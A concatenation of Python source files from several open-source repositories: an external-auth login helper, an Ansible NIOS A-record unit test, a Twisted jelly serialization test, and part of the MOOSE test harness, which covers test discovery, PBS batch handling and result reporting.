# pylint: disable=fixme
# TODO: This function is kind of gnarly/hackish/etc and is only used in one location.
# It'd be awesome if we could get rid of it; manually parsing course_id strings form larger strings
# seems Probably Incorrect
def _parse_course_id_from_string(input_str):
"""
Helper function to determine if input_str (typically the queryparam 'next') contains a course_id.
@param input_str:
@return: the course_id if found, None if not
"""
m_obj = re.match(r'^/courses/{}'.format(settings.COURSE_ID_PATTERN), input_str)
if m_obj:
return CourseKey.from_string(m_obj.group('course_id'))
return None
def _get_course_enrollment_domain(course_id):
"""
Helper function to get the enrollment domain set for a course with id course_id
@param course_id:
@return:
"""
course = modulestore().get_course(course_id)
if course is None:
return None
return course.enrollment_domain
def login(request):
"""Allow external auth to intercept and handle a login request.
Arguments:
request (Request): A request for the login page.
Returns:
Response or None
"""
# Default to a `None` response, indicating that external auth
# is not handling the request.
response = None
if settings.FEATURES['AUTH_USE_CERTIFICATES'] and external_auth.views.ssl_get_cert_from_request(request):
# SSL login doesn't require a view, so redirect
# branding and allow that to process the login if it
# is enabled and the header is in the request.
response = external_auth.views.redirect_with_get('root', request.GET)
elif settings.FEATURES.get('AUTH_USE_CAS'):
# If CAS is enabled, redirect auth handling to there
response = redirect(reverse('cas-login'))
elif settings.FEATURES.get('AUTH_USE_SHIB'):
redirect_to = request.GET.get('next')
if redirect_to:
course_id = _parse_course_id_from_string(redirect_to)
if course_id and _get_course_enrollment_domain(course_id):
response = external_auth.views.course_specific_login(request, course_id.to_deprecated_string())
return response
def register(request):
"""Allow external auth to intercept and handle a registration request.
Arguments:
request (Request): A request for the registration page.
Returns:
Response or None
"""
response = None
if settings.FEATURES.get('AUTH_USE_CERTIFICATES_IMMEDIATE_SIGNUP'):
# Redirect to branding to process their certificate if SSL is enabled
# and registration is disabled.
response = external_auth.views.redirect_with_get('root', request.GET)
return response
|
dagwieers/ansible
|
refs/heads/devel
|
test/units/modules/net_tools/nios/test_nios_a_record.py
|
59
|
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.modules.net_tools.nios import nios_a_record
from ansible.module_utils.net_tools.nios import api
from units.compat.mock import patch, MagicMock, Mock
from .test_nios_module import TestNiosModule, load_fixture
class TestNiosARecordModule(TestNiosModule):
module = nios_a_record
def setUp(self):
super(TestNiosARecordModule, self).setUp()
self.module = MagicMock(name='ansible.modules.net_tools.nios.nios_a_record.WapiModule')
self.module.check_mode = False
self.module.params = {'provider': None}
self.mock_wapi = patch('ansible.modules.net_tools.nios.nios_a_record.WapiModule')
self.exec_command = self.mock_wapi.start()
self.mock_wapi_run = patch('ansible.modules.net_tools.nios.nios_a_record.WapiModule.run')
self.mock_wapi_run.start()
self.load_config = self.mock_wapi_run.start()
def tearDown(self):
super(TestNiosARecordModule, self).tearDown()
self.mock_wapi.stop()
self.mock_wapi_run.stop()
def _get_wapi(self, test_object):
wapi = api.WapiModule(self.module)
wapi.get_object = Mock(name='get_object', return_value=test_object)
wapi.create_object = Mock(name='create_object')
wapi.update_object = Mock(name='update_object')
wapi.delete_object = Mock(name='delete_object')
return wapi
def load_fixtures(self, commands=None):
self.exec_command.return_value = (0, load_fixture('nios_result.txt').strip(), None)
self.load_config.return_value = dict(diff=None, session='session')
def test_nios_a_record_create(self):
self.module.params = {'provider': None, 'state': 'present', 'name': 'a.ansible.com',
'ipv4': '192.168.10.1', 'comment': None, 'extattrs': None}
test_object = None
test_spec = {
"name": {"ib_req": True},
"ipv4": {"ib_req": True},
"comment": {},
"extattrs": {}
}
wapi = self._get_wapi(test_object)
print("WAPI: ", wapi.__dict__)
res = wapi.run('testobject', test_spec)
self.assertTrue(res['changed'])
wapi.create_object.assert_called_once_with('testobject', {'name': self.module._check_type_dict().__getitem__(),
'ipv4': '192.168.10.1'})
def test_nios_a_record_update_comment(self):
self.module.params = {'provider': None, 'state': 'present', 'name': 'a.ansible.com', 'ipv4': '192.168.10.1',
'comment': 'updated comment', 'extattrs': None}
test_object = [
{
"comment": "test comment",
"_ref": "arecord/ZG5zLm5ldHdvcmtfdmlldyQw:default/true",
"name": "a.ansible.com",
"ipv4": "192.168.10.1",
"extattrs": {}
}
]
test_spec = {
"name": {"ib_req": True},
"ipv4": {"ib_req": True},
"comment": {},
"extattrs": {}
}
wapi = self._get_wapi(test_object)
res = wapi.run('testobject', test_spec)
self.assertTrue(res['changed'])
def test_nios_a_record_remove(self):
self.module.params = {'provider': None, 'state': 'absent', 'name': 'a.ansible.com', 'ipv4': '192.168.10.1',
'comment': None, 'extattrs': None}
ref = "arecord/ZG5zLm5ldHdvcmtfdmlldyQw:default/false"
test_object = [{
"comment": "test comment",
"_ref": ref,
"name": "a.ansible.com",
"ipv4": "192.168.10.1",
"extattrs": {'Site': {'value': 'test'}}
}]
test_spec = {
"name": {"ib_req": True},
"ipv4": {"ib_req": True},
"comment": {},
"extattrs": {}
}
wapi = self._get_wapi(test_object)
res = wapi.run('testobject', test_spec)
self.assertTrue(res['changed'])
wapi.delete_object.assert_called_once_with(ref)
def test_nios_a_record_update_record_name(self):
self.module.params = {'provider': None, 'state': 'present', 'name': {'new_name': 'a_new.ansible.com', 'old_name': 'a.ansible.com'},
'comment': 'comment', 'extattrs': None}
test_object = [
{
"comment": "test comment",
"_ref": "arecord/ZG5zLm5ldHdvcmtfdmlldyQw:default/true",
"name": "a_new.ansible.com",
"old_name": "a.ansible.com",
"extattrs": {}
}
]
test_spec = {
"name": {"ib_req": True},
"comment": {},
"extattrs": {}
}
wapi = self._get_wapi(test_object)
res = wapi.run('testobject', test_spec)
self.assertTrue(res['changed'])
wapi.update_object.called_once_with(test_object)
|
fxia22/ASM_xf
|
refs/heads/master
|
PythonD/site_python/twisted/test/test_jelly.py
|
2
|
# Twisted, the Framework of Your Internet
# Copyright (C) 2001 Matthew W. Lefkowitz
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of version 2.1 of the GNU Lesser General Public
# License as published by the Free Software Foundation.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""Test cases for 'jelly' object serialization.
"""
from twisted.spread import jelly
from twisted.test import test_newjelly
class JellyTestCase(test_newjelly.JellyTestCase):
jc = jelly
def testPersistentStorage(self):
perst = [{}, 1]
def persistentStore(obj, jel, perst = perst):
perst[1] = perst[1] + 1
perst[0][perst[1]] = obj
return str(perst[1])
def persistentLoad(pidstr, unj, perst = perst):
pid = int(pidstr)
return perst[0][pid]
SimpleJellyTest = test_newjelly.SimpleJellyTest
a = SimpleJellyTest(1, 2)
b = SimpleJellyTest(3, 4)
c = SimpleJellyTest(5, 6)
a.b = b
a.c = c
c.b = b
jel = self.jc.jelly(a, persistentStore = persistentStore)
x = self.jc.unjelly(jel, persistentLoad = persistentLoad)
self.assertIdentical(x.b, x.c.b)
# assert len(perst) == 3, "persistentStore should only be called 3 times."
self.failUnless(perst[0], "persistentStore was not called.")
self.assertIdentical(x.b, a.b, "Persistent storage identity failure.")
class CircularReferenceTestCase(test_newjelly.CircularReferenceTestCase):
jc = jelly
testCases = [JellyTestCase, CircularReferenceTestCase]
|
paulthulstrup/moose
|
refs/heads/master
|
python/TestHarness/TestHarness.py
|
1
|
import os, sys, re, inspect, types, errno, pprint, subprocess, io, shutil, time, copy, unittest
import path_tool
path_tool.activate_module('FactorySystem')
path_tool.activate_module('argparse')
from ParseGetPot import ParseGetPot
from socket import gethostname
#from options import *
from util import *
from RunParallel import RunParallel
from CSVDiffer import CSVDiffer
from XMLDiffer import XMLDiffer
from Tester import Tester
from PetscJacobianTester import PetscJacobianTester
from InputParameters import InputParameters
from Factory import Factory
from Parser import Parser
from Warehouse import Warehouse
import argparse
from optparse import OptionParser, OptionGroup, Values
from timeit import default_timer as clock
class TestHarness:
@staticmethod
def buildAndRun(argv, app_name, moose_dir):
if '--store-timing' in argv:
harness = TestTimer(argv, app_name, moose_dir)
elif '--testharness-unittest' in argv:
harness = TestHarnessTester(argv, app_name, moose_dir)
else:
harness = TestHarness(argv, app_name, moose_dir)
harness.findAndRunTests()
sys.exit(harness.error_code)
def __init__(self, argv, app_name, moose_dir):
self.factory = Factory()
# Build a Warehouse to hold the MooseObjects
self.warehouse = Warehouse()
# Get dependant applications and load dynamic tester plugins
# If applications have new testers, we expect to find them in <app_dir>/scripts/TestHarness/testers
dirs = [os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))]
sys.path.append(os.path.join(moose_dir, 'framework', 'scripts')) # For find_dep_apps.py
# Use the find_dep_apps script to get the dependant applications for an app
import find_dep_apps
depend_app_dirs = find_dep_apps.findDepApps(app_name)
dirs.extend([os.path.join(my_dir, 'scripts', 'TestHarness') for my_dir in depend_app_dirs.split('\n')])
# Finally load the plugins!
self.factory.loadPlugins(dirs, 'testers', Tester)
self.test_table = []
self.num_passed = 0
self.num_failed = 0
self.num_skipped = 0
self.num_pending = 0
self.host_name = gethostname()
self.moose_dir = moose_dir
self.base_dir = os.getcwd()
self.run_tests_dir = os.path.abspath('.')
self.code = '2d2d6769726c2d6d6f6465'
self.error_code = 0x0
# Assume libmesh is a peer directory to MOOSE if not defined
if os.environ.has_key("LIBMESH_DIR"):
self.libmesh_dir = os.environ['LIBMESH_DIR']
else:
self.libmesh_dir = os.path.join(self.moose_dir, 'libmesh', 'installed')
self.file = None
# Parse arguments
self.parseCLArgs(argv)
self.checks = {}
self.checks['platform'] = getPlatforms()
self.checks['submodules'] = getInitializedSubmodules(self.run_tests_dir)
# The TestHarness doesn't strictly require the existence of libMesh in order to run. Here we allow the user
# to select whether they want to probe for libMesh configuration options.
if self.options.skip_config_checks:
self.checks['compiler'] = set(['ALL'])
self.checks['petsc_version'] = 'N/A'
self.checks['library_mode'] = set(['ALL'])
self.checks['mesh_mode'] = set(['ALL'])
self.checks['dtk'] = set(['ALL'])
self.checks['unique_ids'] = set(['ALL'])
self.checks['vtk'] = set(['ALL'])
self.checks['tecplot'] = set(['ALL'])
self.checks['dof_id_bytes'] = set(['ALL'])
self.checks['petsc_debug'] = set(['ALL'])
self.checks['curl'] = set(['ALL'])
self.checks['tbb'] = set(['ALL'])
self.checks['superlu'] = set(['ALL'])
self.checks['slepc'] = set(['ALL'])
self.checks['unique_id'] = set(['ALL'])
self.checks['cxx11'] = set(['ALL'])
self.checks['asio'] = set(['ALL'])
else:
self.checks['compiler'] = getCompilers(self.libmesh_dir)
self.checks['petsc_version'] = getPetscVersion(self.libmesh_dir)
self.checks['library_mode'] = getSharedOption(self.libmesh_dir)
self.checks['mesh_mode'] = getLibMeshConfigOption(self.libmesh_dir, 'mesh_mode')
self.checks['dtk'] = getLibMeshConfigOption(self.libmesh_dir, 'dtk')
self.checks['unique_ids'] = getLibMeshConfigOption(self.libmesh_dir, 'unique_ids')
self.checks['vtk'] = getLibMeshConfigOption(self.libmesh_dir, 'vtk')
self.checks['tecplot'] = getLibMeshConfigOption(self.libmesh_dir, 'tecplot')
self.checks['dof_id_bytes'] = getLibMeshConfigOption(self.libmesh_dir, 'dof_id_bytes')
self.checks['petsc_debug'] = getLibMeshConfigOption(self.libmesh_dir, 'petsc_debug')
self.checks['curl'] = getLibMeshConfigOption(self.libmesh_dir, 'curl')
self.checks['tbb'] = getLibMeshConfigOption(self.libmesh_dir, 'tbb')
self.checks['superlu'] = getLibMeshConfigOption(self.libmesh_dir, 'superlu')
self.checks['slepc'] = getLibMeshConfigOption(self.libmesh_dir, 'slepc')
self.checks['unique_id'] = getLibMeshConfigOption(self.libmesh_dir, 'unique_id')
self.checks['cxx11'] = getLibMeshConfigOption(self.libmesh_dir, 'cxx11')
self.checks['asio'] = getIfAsioExists(self.moose_dir)
# Override the MESH_MODE option if using the '--distributed-mesh'
# or (deprecated) '--parallel-mesh' option.
if (self.options.parallel_mesh == True or self.options.distributed_mesh == True) or \
(self.options.cli_args != None and \
(self.options.cli_args.find('--parallel-mesh') != -1 or self.options.cli_args.find('--distributed-mesh') != -1)):
option_set = set(['ALL', 'PARALLEL'])
self.checks['mesh_mode'] = option_set
method = set(['ALL', self.options.method.upper()])
self.checks['method'] = method
self.initialize(argv, app_name)
"""
Recursively walks the current tree looking for tests to run
Error codes:
0x0 - Success
0x0* - Parser error
0x1* - TestHarness error
"""
def findAndRunTests(self, find_only=False):
self.error_code = 0x0
self.preRun()
self.start_time = clock()
try:
# PBS STUFF
if self.options.pbs:
# Check to see if we are using the PBS Emulator.
# Its expensive, so it must remain outside of the os.walk for loop.
self.options.PBSEmulator = self.checkPBSEmulator()
if self.options.pbs and os.path.exists(self.options.pbs):
self.options.processingPBS = True
self.processPBSResults()
else:
self.options.processingPBS = False
self.base_dir = os.getcwd()
for dirpath, dirnames, filenames in os.walk(self.base_dir, followlinks=True):
# Prune submdule paths when searching for tests
if self.base_dir != dirpath and os.path.exists(os.path.join(dirpath, '.git')):
dirnames[:] = []
# walk into directories that aren't contrib directories
if "contrib" not in os.path.relpath(dirpath, os.getcwd()):
for file in filenames:
# set cluster_handle to be None initially (happens for each test)
self.options.cluster_handle = None
# See if there were other arguments (test names) passed on the command line
if file == self.options.input_file_name: #and self.test_match.search(file):
saved_cwd = os.getcwd()
sys.path.append(os.path.abspath(dirpath))
os.chdir(dirpath)
if self.prunePath(file):
continue
# Build a Parser to parse the objects
parser = Parser(self.factory, self.warehouse)
# Parse it
self.error_code = self.error_code | parser.parse(file)
# Retrieve the tests from the warehouse
testers = self.warehouse.getActiveObjects()
# Augment the Testers with additional information directly from the TestHarness
for tester in testers:
self.augmentParameters(file, tester)
# Short circuit this loop if we've only been asked to parse Testers
# Note: The warehouse will accumulate all testers in this mode
if find_only:
self.warehouse.markAllObjectsInactive()
continue
# Clear out the testers, we won't need them to stick around in the warehouse
self.warehouse.clear()
if self.options.enable_recover:
testers = self.appendRecoverableTests(testers)
# Handle PBS tests.cluster file
if self.options.pbs:
(tester, command) = self.createClusterLauncher(dirpath, testers)
if command is not None:
self.runner.run(tester, command)
else:
# Go through the Testers and run them
for tester in testers:
# Double the alloted time for tests when running with the valgrind option
tester.setValgrindMode(self.options.valgrind_mode)
# When running in valgrind mode, we end up with a ton of output for each failed
# test. Therefore, we limit the number of fails...
if self.options.valgrind_mode and self.num_failed > self.options.valgrind_max_fails:
(should_run, reason) = (False, 'Max Fails Exceeded')
elif self.num_failed > self.options.max_fails:
(should_run, reason) = (False, 'Max Fails Exceeded')
elif tester.parameters().isValid('error_code'):
(should_run, reason) = (False, 'skipped (Parser Error)')
else:
(should_run, reason) = tester.checkRunnableBase(self.options, self.checks)
if should_run:
command = tester.getCommand(self.options)
# This method spawns another process and allows this loop to continue looking for tests
# RunParallel will call self.testOutputAndFinish when the test has completed running
# This method will block when the maximum allowed parallel processes are running
self.runner.run(tester, command)
else: # This job is skipped - notify the runner
if reason != '':
if (self.options.report_skipped and reason.find('skipped') != -1) or reason.find('skipped') == -1:
self.handleTestResult(tester.parameters(), '', reason)
self.runner.jobSkipped(tester.parameters()['test_name'])
os.chdir(saved_cwd)
sys.path.pop()
except KeyboardInterrupt:
print '\nExiting due to keyboard interrupt...'
sys.exit(0)
self.runner.join()
# Wait for all tests to finish
if self.options.pbs and self.options.processingPBS == False:
print '\n< checking batch status >\n'
self.options.processingPBS = True
self.processPBSResults()
self.cleanup()
# Flags for the parser start at the low bit, flags for the TestHarness start at the high bit
if self.num_failed:
self.error_code = self.error_code | 0x80
return
def createClusterLauncher(self, dirpath, testers):
self.options.test_serial_number = 0
command = None
tester = None
# Create the tests.cluster input file
# Loop through each tester and create a job
for tester in testers:
(should_run, reason) = tester.checkRunnableBase(self.options, self.checks)
if should_run:
if self.options.cluster_handle == None:
self.options.cluster_handle = open(dirpath + '/' + self.options.pbs + '.cluster', 'w')
self.options.cluster_handle.write('[Jobs]\n')
# This returns the command to run as well as builds the parameters of the test
# The resulting command once this loop has completed is sufficient to launch
# all previous jobs
command = tester.getCommand(self.options)
self.options.cluster_handle.write('[]\n')
self.options.test_serial_number += 1
else: # This job is skipped - notify the runner
if (reason != ''):
self.handleTestResult(tester.parameters(), '', reason)
self.runner.jobSkipped(tester.parameters()['test_name'])
# Close the tests.cluster file
if self.options.cluster_handle is not None:
self.options.cluster_handle.close()
self.options.cluster_handle = None
# Return the final tester/command (sufficient to run all tests)
return (tester, command)
def prunePath(self, filename):
test_dir = os.path.abspath(os.path.dirname(filename))
# Filter tests that we want to run
# Under the new format, we will filter based on directory not filename since it is fixed
prune = True
if len(self.tests) == 0:
prune = False # No filter
else:
for item in self.tests:
if test_dir.find(item) > -1:
prune = False
# Return the inverse of will_run to indicate that this path should be pruned
return prune
def augmentParameters(self, filename, tester):
params = tester.parameters()
# We are going to do some formatting of the path that is printed
# Case 1. If the test directory (normally matches the input_file_name) comes first,
# we will simply remove it from the path
# Case 2. If the test directory is somewhere in the middle then we should preserve
# the leading part of the path
test_dir = os.path.abspath(os.path.dirname(filename))
relative_path = test_dir.replace(self.run_tests_dir, '')
relative_path = relative_path.replace('/' + self.options.input_file_name + '/', ':')
relative_path = re.sub('^[/:]*', '', relative_path) # Trim slashes and colons
formatted_name = relative_path + '.' + tester.name()
params['test_name'] = formatted_name
params['test_dir'] = test_dir
params['relative_path'] = relative_path
params['executable'] = self.executable
params['hostname'] = self.host_name
params['moose_dir'] = self.moose_dir
params['base_dir'] = self.base_dir
if params.isValid('prereq'):
if type(params['prereq']) != list:
print "Option 'prereq' needs to be of type list in " + params['test_name']
sys.exit(1)
params['prereq'] = [relative_path.replace('/tests/', '') + '.' + item for item in params['prereq']]
# This method splits a lists of tests into two pieces each, the first piece will run the test for
# approx. half the number of timesteps and will write out a restart file. The second test will
# then complete the run using the MOOSE recover option.
def appendRecoverableTests(self, testers):
new_tests = []
for part1 in testers:
if part1.parameters()['recover'] == True:
# Clone the test specs
part2 = copy.deepcopy(part1)
# Part 1:
part1_params = part1.parameters()
part1_params['test_name'] += '_part1'
part1_params['cli_args'].append('--half-transient Outputs/checkpoint=true')
part1_params['skip_checks'] = True
# Part 2:
part2_params = part2.parameters()
part2_params['prereq'].append(part1.parameters()['test_name'])
part2_params['delete_output_before_running'] = False
part2_params['cli_args'].append('--recover')
part2_params.addParam('caveats', ['recover'], "")
new_tests.append(part2)
testers.extend(new_tests)
return testers
## Finish the test by inspecting the raw output
def testOutputAndFinish(self, tester, retcode, output, start=0, end=0):
caveats = []
test = tester.specs # Need to refactor
if test.isValid('caveats'):
caveats = test['caveats']
if self.options.pbs and self.options.processingPBS == False:
(reason, output) = self.buildPBSBatch(output, tester)
elif self.options.dry_run:
reason = 'DRY_RUN'
output += '\n'.join(tester.processResultsCommand(self.moose_dir, self.options))
else:
(reason, output) = tester.processResults(self.moose_dir, retcode, self.options, output)
if self.options.scaling and test['scale_refine']:
caveats.append('scaled')
did_pass = True
if reason == '':
# It ran OK but is this test set to be skipped on any platform, compiler, so other reason?
if self.options.extra_info:
checks = ['platform', 'compiler', 'petsc_version', 'mesh_mode', 'method', 'library_mode', 'dtk', 'unique_ids']
for check in checks:
if not 'ALL' in test[check]:
caveats.append(', '.join(test[check]))
if len(caveats):
result = '[' + ', '.join(caveats).upper() + '] OK'
elif self.options.pbs and self.options.processingPBS == False:
result = 'LAUNCHED'
else:
result = 'OK'
elif reason == 'DRY_RUN':
result = 'DRY_RUN'
else:
result = 'FAILED (%s)' % reason
did_pass = False
if self.options.pbs and self.options.processingPBS == False and did_pass == True:
# Handle the launch result, but do not add it to the results table (except if we learned that QSUB failed to launch for some reason)
self.handleTestResult(tester.specs, output, result, start, end, False)
return did_pass
else:
self.handleTestResult(tester.specs, output, result, start, end)
return did_pass
def getTiming(self, output):
time = ''
m = re.search(r"Active time=(\S+)", output)
if m != None:
return m.group(1)
def getSolveTime(self, output):
time = ''
m = re.search(r"solve().*", output)
if m != None:
return m.group().split()[5]
def checkExpectError(self, output, expect_error):
if re.search(expect_error, output, re.MULTILINE | re.DOTALL) == None:
#print "%" * 100, "\nExpect Error Pattern not found:\n", expect_error, "\n", "%" * 100, "\n"
return False
else:
return True
# PBS Defs
def checkPBSEmulator(self):
try:
qstat_process = subprocess.Popen(['qstat', '--version'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
qstat_output = qstat_process.communicate()
except OSError:
# qstat binary is not available
print 'qstat not available. Perhaps you need to load the PBS module?'
sys.exit(1)
if len(qstat_output[1]):
# The PBS Emulator has no --version argument, and thus returns output to stderr
return True
else:
return False
def processPBSResults(self):
# If batch file exists, check the contents for pending tests.
if os.path.exists(self.options.pbs):
# Build a list of launched jobs
batch_file = open(self.options.pbs)
batch_list = [y.split(':') for y in [x for x in batch_file.read().split('\n')]]
batch_file.close()
del batch_list[-1:]
# Loop through launched jobs and match the TEST_NAME to determin correct stdout (Output_Path)
for job in batch_list:
file = '/'.join(job[2].split('/')[:-2]) + '/' + job[3]
# Build a Warehouse to hold the MooseObjects
warehouse = Warehouse()
# Build a Parser to parse the objects
parser = Parser(self.factory, warehouse)
# Parse it
parser.parse(file)
# Retrieve the tests from the warehouse
testers = warehouse.getAllObjects()
for tester in testers:
self.augmentParameters(file, tester)
for tester in testers:
# Build the requested Tester object
if job[1] == tester.parameters()['test_name']:
# Create Test Type
# test = self.factory.create(tester.parameters()['type'], tester)
# Get job status via qstat
qstat = ['qstat', '-f', '-x', str(job[0])]
qstat_command = subprocess.Popen(qstat, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
qstat_stdout = qstat_command.communicate()[0]
if qstat_stdout != None:
output_value = re.search(r'job_state = (\w+)', qstat_stdout).group(1)
else:
return ('QSTAT NOT FOUND', '')
# Report the current status of JOB_ID
if output_value == 'F':
# F = Finished. Get the exit code reported by qstat
exit_code = int(re.search(r'Exit_status = (-?\d+)', qstat_stdout).group(1))
# Read the stdout file
if os.path.exists(job[2]):
output_file = open(job[2], 'r')
# Not sure I am doing this right: I have to change the TEST_DIR to match the temporary cluster_launcher TEST_DIR location, thus violating the tester.specs...
tester.parameters()['test_dir'] = '/'.join(job[2].split('/')[:-1])
outfile = output_file.read()
output_file.close()
self.testOutputAndFinish(tester, exit_code, outfile)
else:
# I ran into this scenario when the cluster went down, but launched/completed my job :)
self.handleTestResult(tester.specs, '', 'FAILED (NO STDOUT FILE)', 0, 0, True)
elif output_value == 'R':
# Job is currently running
self.handleTestResult(tester.specs, '', 'RUNNING', 0, 0, True)
elif output_value == 'E':
# Job is exiting
self.handleTestResult(tester.specs, '', 'EXITING', 0, 0, True)
elif output_value == 'Q':
# Job is currently queued
self.handleTestResult(tester.specs, '', 'QUEUED', 0, 0, True)
else:
return ('BATCH FILE NOT FOUND', '')
def buildPBSBatch(self, output, tester):
# Create/Update the batch file
if 'command not found' in output:
return ('QSUB NOT FOUND', '')
else:
# Get the Job information from the ClusterLauncher
results = re.findall(r'JOB_NAME: (\w+) JOB_ID:.* (\d+).*TEST_NAME: (\S+)', output)
if len(results) != 0:
file_name = self.options.pbs
job_list = open(os.path.abspath(os.path.join(tester.specs['executable'], os.pardir)) + '/' + file_name, 'a')
for result in results:
(test_dir, job_id, test_name) = result
qstat_command = subprocess.Popen(['qstat', '-f', '-x', str(job_id)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
qstat_stdout = qstat_command.communicate()[0]
# Get the Output_Path from qstat stdout
if qstat_stdout != None:
output_value = re.search(r'Output_Path(.*?)(^ +)', qstat_stdout, re.S | re.M).group(1)
output_value = output_value.split(':')[1].replace('\n', '').replace('\t', '').strip()
else:
job_list.close()
return ('QSTAT NOT FOUND', '')
# Write job_id, test['test_name'], and Ouput_Path to the batch file
job_list.write(str(job_id) + ':' + test_name + ':' + output_value + ':' + self.options.input_file_name + '\n')
# Return to TestHarness and inform we have launched the job
job_list.close()
return ('', 'LAUNCHED')
else:
return ('QSTAT INVALID RESULTS', output)
def cleanPBSBatch(self):
# Open the PBS batch file and assign it to a list
if os.path.exists(self.options.pbs_cleanup):
batch_file = open(self.options.pbs_cleanup, 'r')
batch_list = [y.split(':') for y in [x for x in batch_file.read().split('\n')]]
batch_file.close()
del batch_list[-1:]
else:
print 'PBS batch file not found:', self.options.pbs_cleanup
sys.exit(1)
# Loop through launched jobs and delete whats found.
for job in batch_list:
if os.path.exists(job[2]):
batch_dir = os.path.abspath(os.path.join(job[2], os.pardir)).split('/')
if os.path.exists('/'.join(batch_dir)):
shutil.rmtree('/'.join(batch_dir))
if os.path.exists('/'.join(batch_dir[:-1]) + '/' + self.options.pbs_cleanup + '.cluster'):
os.remove('/'.join(batch_dir[:-1]) + '/' + self.options.pbs_cleanup + '.cluster')
os.remove(self.options.pbs_cleanup)
# END PBS Defs
## Update global variables and print output based on the test result
# Containing OK means it passed, skipped means skipped, anything else means it failed
def handleTestResult(self, specs, output, result, start=0, end=0, add_to_table=True):
timing = ''
if self.options.timing:
timing = self.getTiming(output)
elif self.options.store_time:
timing = self.getSolveTime(output)
# Only add to the test_table if told to. We now have enough cases where we wish to print to the screen, but not
# in the 'Final Test Results' area.
if add_to_table:
self.test_table.append( (specs, output, result, timing, start, end) )
if result.find('OK') != -1 or result.find('DRY_RUN') != -1:
self.num_passed += 1
elif result.find('skipped') != -1:
self.num_skipped += 1
elif result.find('deleted') != -1:
self.num_skipped += 1
elif result.find('LAUNCHED') != -1 or result.find('RUNNING') != -1 or result.find('QUEUED') != -1 or result.find('EXITING') != -1:
self.num_pending += 1
else:
self.num_failed += 1
self.postRun(specs, timing)
if self.options.show_directory:
print printResult(specs['relative_path'] + '/' + specs['test_name'].split('/')[-1], result, timing, start, end, self.options)
else:
print printResult(specs['test_name'], result, timing, start, end, self.options)
if self.options.verbose or ('FAILED' in result and not self.options.quiet):
output = output.replace('\r', '\n') # replace the carriage returns with newlines
lines = output.split('\n');
color = ''
if 'EXODIFF' in result or 'CSVDIFF' in result:
color = 'YELLOW'
elif 'FAILED' in result:
color = 'RED'
else:
color = 'GREEN'
test_name = colorText(specs['test_name'] + ": ", color, colored=self.options.colored, code=self.options.code)
output = test_name + ("\n" + test_name).join(lines)
print output
# Print result line again at the bottom of the output for failed tests
if self.options.show_directory:
print printResult(specs['relative_path'] + '/' + specs['test_name'].split('/')[-1], result, timing, start, end, self.options), "(reprint)"
else:
print printResult(specs['test_name'], result, timing, start, end, self.options), "(reprint)"
if not 'skipped' in result:
if self.options.file:
if self.options.show_directory:
self.file.write(printResult( specs['relative_path'] + '/' + specs['test_name'].split('/')[-1], result, timing, start, end, self.options, color=False) + '\n')
self.file.write(output)
else:
self.file.write(printResult( specs['test_name'], result, timing, start, end, self.options, color=False) + '\n')
self.file.write(output)
if self.options.sep_files or (self.options.fail_files and 'FAILED' in result) or (self.options.ok_files and result.find('OK') != -1):
fname = os.path.join(specs['test_dir'], specs['test_name'].split('/')[-1] + '.' + result[:6] + '.txt')
f = open(fname, 'w')
f.write(printResult( specs['test_name'], result, timing, start, end, self.options, color=False) + '\n')
f.write(output)
f.close()
# Write the app_name to a file, if the tests passed
def writeState(self, app_name):
# If we encounter bitten_status_moose environment, build a line itemized list of applications which passed their tests
if os.environ.has_key("BITTEN_STATUS_MOOSE"):
result_file = open(os.path.join(self.moose_dir, 'test_results.log'), 'a')
result_file.write(os.path.split(app_name)[1].split('-')[0] + '\n')
result_file.close()
# Print final results, close open files, and exit with the correct error code
def cleanup(self):
# Print the results table again if a bunch of output was spewed to the screen between
# tests as they were running
if self.options.verbose or (self.num_failed != 0 and not self.options.quiet):
print '\n\nFinal Test Results:\n' + ('-' * (TERM_COLS-1))
for (test, output, result, timing, start, end) in sorted(self.test_table, key=lambda x: x[2], reverse=True):
if self.options.show_directory:
print printResult(test['relative_path'] + '/' + specs['test_name'].split('/')[-1], result, timing, start, end, self.options)
else:
print printResult(test['test_name'], result, timing, start, end, self.options)
time = clock() - self.start_time
print '-' * (TERM_COLS-1)
print 'Ran %d tests in %.1f seconds' % (self.num_passed+self.num_failed, time)
if self.num_passed:
summary = '<g>%d passed</g>'
else:
summary = '<b>%d passed</b>'
summary += ', <b>%d skipped</b>'
if self.num_pending:
summary += ', <c>%d pending</c>'
else:
summary += ', <b>%d pending</b>'
if self.num_failed:
summary += ', <r>%d FAILED</r>'
else:
summary += ', <b>%d failed</b>'
# Mask off TestHarness error codes to report parser errors
if self.error_code & Parser.getErrorCodeMask():
summary += ', <r>FATAL PARSER ERROR</r>'
print colorText( summary % (self.num_passed, self.num_skipped, self.num_pending, self.num_failed), "", html = True, \
colored=self.options.colored, code=self.options.code )
if self.options.pbs:
print '\nYour PBS batch file:', self.options.pbs
if self.file:
self.file.close()
if self.num_failed == 0:
self.writeState(self.executable)
def initialize(self, argv, app_name):
# Initialize the parallel runner with how many tests to run in parallel
self.runner = RunParallel(self, self.options.jobs, self.options.load)
## Save executable-under-test name to self.executable
self.executable = os.getcwd() + '/' + app_name + '-' + self.options.method
# Save the output dir since the current working directory changes during tests
self.output_dir = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), self.options.output_dir)
# Create the output dir if they ask for it. It is easier to ask for forgiveness than permission
if self.options.output_dir:
try:
